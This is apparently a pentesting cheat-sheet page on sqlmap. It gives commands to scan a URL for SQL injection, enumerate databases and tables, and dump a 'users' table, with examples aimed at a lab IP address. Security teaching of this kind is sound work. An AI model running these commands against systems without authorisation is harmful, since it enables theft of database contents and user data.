sqlmap

Sqlmap is an enumeration tool used to identify sql injection vulnerabilities on web application.

Basic sqlmap Commands

  1. Basic SQL Injection Scan Scan a URL for SQL injection vulnerabilities with a defined level of testing:

    sqlmap -u <URL_REQUEST> --level=5

    Example:

    sqlmap -u 'http://10.10.99.139/ai/includes/user_login?email=test&password=hello' --level=5

  2. List Databases List all databases available on the target:

    sqlmap -u <URL_REQUEST> --level=5 --dbs

  3. List Tables of a Specific Database List all tables in a specified database:

    sqlmap -u <URL_REQUEST> --level=5 -D <DATABASE> --tables

    Example:

    sqlmap -u 'http://10.10.99.139/ai/includes/user_login?email=test&password=hello' --level=5 -D 'my_database' --tables

  4. Dump Data from a Specific Table Dump the contents of a table in a specified database:

    sqlmap -u <URL_REQUEST> --level=5 -D <DATABASE> -T <TABLE> --dump

    Example:

    sqlmap -u 'http://10.10.99.139/ai/includes/user_login?email=test&password=hello' --level=5 -D 'my_database' -T 'users' --dump

Advanced Usage

  1. Use Intercepted HTTP Request If you have an intercepted request saved to a file (e.g., intercepted_request.txt), you can use it as input for sqlmap:

    sqlmap -r intercepted_request.txt

  • --level=5 specifies the testing level, where 5 means the most thorough scan.

PreviousniktoNextwpscan

Last updated